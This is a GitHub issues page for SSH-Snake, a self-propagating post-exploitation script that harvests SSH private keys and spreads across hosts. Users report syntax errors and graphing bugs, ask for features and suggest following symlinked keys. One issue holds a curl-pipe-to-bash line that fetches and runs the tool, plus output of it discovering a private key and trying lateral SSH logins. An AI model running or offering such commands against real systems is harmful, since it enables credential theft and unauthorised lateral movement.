
megamansec / ssh-snake


SSH-Snake is a self-propagating, self-replicating, file-less script that automates the post-exploitation task of SSH private key and host discovery.

Home Page: https://megamansec.github.io/SSH-Snake/

License: GNU Affero General Public License v3.0

Shell 88.55% Python 11.45%
bash exploitation exploitation-tool hacking hacking-tools pentesting post-exploitation security security-tools ssh


ssh-snake's Issues

Syntax Error in No-Comments Version

I am trying to run SSH Snake on my Ubuntu (22.04.1) machine. When I run the Snake.sh script, everything seems to work just fine. However, the no-comments version fails:

➜  ~ bash ./Snake.nocomments.sh
<very beautiful ASCII art>
|-----------------------------------------|------------------------------|
| Setting                                 | Value                        |
|-----------------------------------------|------------------------------|
| ignore_user                             | 0                            |
| use_sudo                                | 1                            |
| ssh_timeout                             | 3                            |
| retry_count                             | 3                            |
| scan_paths                              |                              |
| scan_paths_depth                        | 3                            |
| interesting_users                       | joe root                     |
| interesting_hosts                       | 127.0.0.1                    |
| interesting_dests                       |                              |
| ignored_users                           |                              |
| ignored_hosts                           |                              |
| ignored_dests                           |                              |
| ignored_key_files                       | *badcert.pem* *badkey.pem*   |
| custom_cmds                             |                              |
| use_combinate_interesting_users_hosts   | 1                            |
| use_combinate_users_hosts_aggressive    | 0                            |
| use_find_from_hosts                     | 1                            |
| use_find_from_last                      | 1                            |
| use_find_from_authorized_keys           | 1                            |
| use_find_from_known_hosts               | 1                            |
| use_find_from_ssh_config                | 1                            |
| use_find_from_bash_history              | 1                            |
| use_find_arp_neighbours                 | 1                            |
| use_find_d_block                        | 0                            |
| use_find_from_hashed_known_hosts        | 0                            |
| use_find_from_prev_dest                 | 1                            |
| use_find_from_ignore_list               | 0                            |
| use_retry_all_dests                     | 1                            |
|-----------------------------------------|------------------------------|


[1704474699]bash: line 50: syntax error near unexpected token `}'
[1704474699]bash: line 50: `}'


---------------------------------------

use_retry_all_dests=1. Re-starting.
1 destinations (from 0 unique servers) added to interesting_dests.

---------------------------------------


[1704474699]bash: line 48: syntax error near unexpected token `}'
[1704474699]bash: line 48: `}'



<very beautiful ASCII art>
Unique private keys discovered: 0
Unique shell accounts accessed: 0
Unique systems accessed: 0

Need a list of servers accessed? Run one of these commands:

grep -oE "[a-z_][a-z0-9_-]{0,31}@[0-9\.]*$" output.log  | sort -u
grep -oE "[a-z_][a-z0-9_-]{0,31}@\([0-9\.:]*\)$" output.log  | sort -u
-- https://joshua.hu/ --
-- https://github.com/MegaManSec/SSH-Snake --

Thanks for playing!

Issues on older systems

Thanks for the script!
Running on an older system, there are a few syntax problems:

root@REDACTED:~# curl https://raw.githubusercontent.com/MegaManSec/SSH-Snake/main/Snake.nocomments.sh | stdbuf -o0 bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
X.X.X.X  X.X.X.X    0     0   259k      0 --:--:-- --:--:-- --:--:--  260k
...
ASCII
...

________________________~_____/^,___,-^\_________________~~_______________/`
|-----------------------------------------|------------------------------|
| Setting                                 | Value                        |
|-----------------------------------------|------------------------------|
| ignore_user                             | 0                            |
| use_sudo                                | 1                            |
| ssh_timeout                             | 3                            |
| retry_count                             | 3                            |
| scan_paths                              |                              |
| scan_paths_depth                        | 3                            |
| interesting_users                       | root root                    |
| interesting_hosts                       | X.X.X.X                    |
| interesting_dests                       |                              |
| ignored_users                           |                              |
| ignored_hosts                           |                              |
| ignored_dests                           |                              |
| ignored_key_files                       | *badcert.pem* *badkey.pem*   |
| custom_cmds                             |                              |
| use_combinate_interesting_users_hosts   | 1                            |
| use_combinate_users_hosts_aggressive    | 0                            |
| use_find_from_hosts                     | 1                            |
| use_find_from_last                      | 1                            |
| use_find_from_authorized_keys           | 1                            |
| use_find_from_known_hosts               | 1                            |
| use_find_from_ssh_config                | 1                            |
| use_find_from_bash_history              | 1                            |
| use_find_arp_neighbours                 | 1                            |
| use_find_d_block                        | 0                            |
| use_find_from_hashed_known_hosts        | 0                            |
| use_find_from_prev_dest                 | 1                            |
| use_find_from_ignore_list               | 0                            |
| use_retry_all_dests                     | 1                            |
|-----------------------------------------|------------------------------|


[X.X.X.X][email protected]
[X.X.X.X]root@(X.X.X.X:X.X.X.X:X.X.X.X)
[X.X.X.X]bash: line 205: init_ignored: command not found
[X.X.X.X]bash: line 911: exec_custom_cmds: command not found
[X.X.X.X][email protected]: Discovered usable private key in [/root/.ssh/id_rsa]
[X.X.X.X][email protected]: EXTERNAL_MSG: KEY[/root/.ssh/id_rsa]: REDACTED
[X.X.X.X]bash: line 553: find_ssh_keys_paths: command not found
[X.X.X.X]bash: line 562: find_d_block: command not found
[X.X.X.X]bash: line 564: find_from_ignore_list: command not found
[X.X.X.X]bash: line 565: find_from_hashed_known_hosts: command not found
[X.X.X.X]bash: line 913: combinate_users_hosts_aggressive: command not found
[X.X.X.X][email protected]: EXTERNAL_MSG: INFO: Beginning with 17 dests and 1 keys
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes


---------------------------------------

use_retry_all_dests=1. Re-starting.
3 destinations (from 1 unique servers) added to interesting_dests.

---------------------------------------


[X.X.X.X][email protected]
[X.X.X.X]root@(X.X.X.X:X.X.X.X:X.X.X.X)
[X.X.X.X]bash: line 205: init_ignored: command not found
[X.X.X.X]bash: line 735: exec_custom_cmds: command not found
[X.X.X.X][email protected]: Discovered usable private key in [/root/.ssh/id_rsa]
[X.X.X.X][email protected]: EXTERNAL_MSG: KEY[/root/.ssh/id_rsa]: REDACTED
[X.X.X.X]bash: line 469: find_ssh_keys_paths: command not found
[X.X.X.X]bash: line 473: find_from_authorized_keys: command not found
[X.X.X.X]bash: line 474: find_from_last: command not found
[X.X.X.X]bash: line 475: find_from_known_hosts: command not found
[X.X.X.X]bash: line 476: find_from_hosts: command not found
[X.X.X.X]bash: line 477: find_arp_neighbours: command not found
[X.X.X.X]bash: line 478: find_d_block: command not found
[X.X.X.X]bash: line 479: find_from_prev_dest: command not found
[X.X.X.X]bash: line 480: find_from_ignore_list: command not found
[X.X.X.X]bash: line 481: find_from_hashed_known_hosts: command not found
[X.X.X.X]bash: line 737: combinate_users_hosts_aggressive: command not found
[X.X.X.X]bash: line 738: combinate_interesting_users_hosts: command not found
[X.X.X.X]bash: line 739: deduplicate_resolved_hosts_keys: command not found
[X.X.X.X][email protected]: EXTERNAL_MSG: INFO: Beginning with 3 dests and 1 keys
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes
[X.X.X.X] [email protected][/root/.ssh/id_rsa]->[email protected] [line]: command-line: line 0: Bad configuration option: pubkeyacceptedkeytypes



               ______
          _.-""      ""-._
       .-'                `-.
     .'      __.----.__      `.
    /     .-"          "-.     \
   /    .'                `.    \
  J    /                    \    L
  F   J                      L   J
 J    F                      J    L
 |   J                        L   |
 |   |                        |   |
 |   J                        F   |
 J    L                      J    F
  L   J   .-""""-.           F   J
  J    \ /        \   __    /    F
   \    (|)(|)_   .-'".'  .'    /
    \    \   /_>-'  .<_.-'     /
     `.   `-'     .'         .'
       `--.|___.-'`._    _.-'
           ^         """"

           ..             ..
          ( '`<          ( '`<  ...Summary Report:
           )(             )(
    ( ----'  '.    ( ----'  '.
    (         ;    (         ;
     (_______,'     (_______,'
~^~^~^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^~~^~^~^~^~^
Unique private keys discovered: 1
Unique shell accounts accessed: 1
Unique systems accessed: 1

Need a list of servers accessed? Run one of these commands:

grep -oE "[a-z_][a-z0-9_-]{0,31}@[0-9\.]*$" output.log  | sort | uniq
grep -oE "[a-z_][a-z0-9_-]{0,31}@\([0-9\.:]*\)$" output.log  | sort | uniq
-- https://joshua.hu/ --
-- https://github.com/MegaManSec/SSH-Snake --

Thanks for playing!

openssl version: OpenSSL 1.0.1t 3 May 2016
bash --version : GNU bash, version 4.3.30(1)-release (x86_64-pc-linux-gnu)

Show hostname instead of IP

Is there a way to show the hostname instead of the IP in the printout, and ultimately the visualization?

One could do a lookup retroactively of course, but if the script is running on the hosts anyway...

Sorry if there already is an option and I missed it.

Syntax error

bash ./Snake.nocomments.sh
bash: line 449: conditional binary operator expected
bash: line 449: syntax error near `'current_ips["$ignored_host"]''
bash: line 449: `[[ -v 'current_ips["$ignored_host"]' || ${#current_ips["$ignored_host"]} -gt 0 ]] && fin'

Error with pydot in generate-graph.py

$ python3 generate-graph.py --file ~/snake.log --with-users --format dot
Traceback (most recent call last):
  File "/home/clem/git/SSH-Snake/tools/generate-graph.py", line 110, in <module>
    nx.drawing.nx_pydot.write_dot(graph, output_dot_file_path)
  File "/home/clem/git/SSH-Snake/tools/venv/lib64/python3.12/site-packages/networkx/utils/decorators.py", line 770, in func
    return argmap._lazy_compile(__wrapper)(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "<class 'networkx.utils.decorators.argmap'> compilation 5", line 5, in argmap_write_dot_1
  File "/home/clem/git/SSH-Snake/tools/venv/lib64/python3.12/site-packages/networkx/drawing/nx_pydot.py", line 51, in write_dot
    P = to_pydot(G)
        ^^^^^^^^^^^
  File "/home/clem/git/SSH-Snake/tools/venv/lib64/python3.12/site-packages/networkx/drawing/nx_pydot.py", line 265, in to_pydot
    raise ValueError(
ValueError: Node names and attributes should not contain ":" unless they are quoted with "".                For example the string 'attribute:data1' should be written as '"attribute:data1"'.                Please refer https://github.com/pydot/pydot/issues/258

Find Symlinked Keys

Hi,

In my .ssh directory, I have several private keys that are symlinked (from their actual physical location on my filesystem). The script doesn't follow symlinks (in discovering private keys), thus misses out on other keys to use. Adding a -L to the find will find all symlinked keys around about here.

I would be happy to do a PR for you if you wish.

-=david=-

Linux machine specifics.

Script makes use of non-standard POSIX tooling, making it not portable to other like systems without those tools.
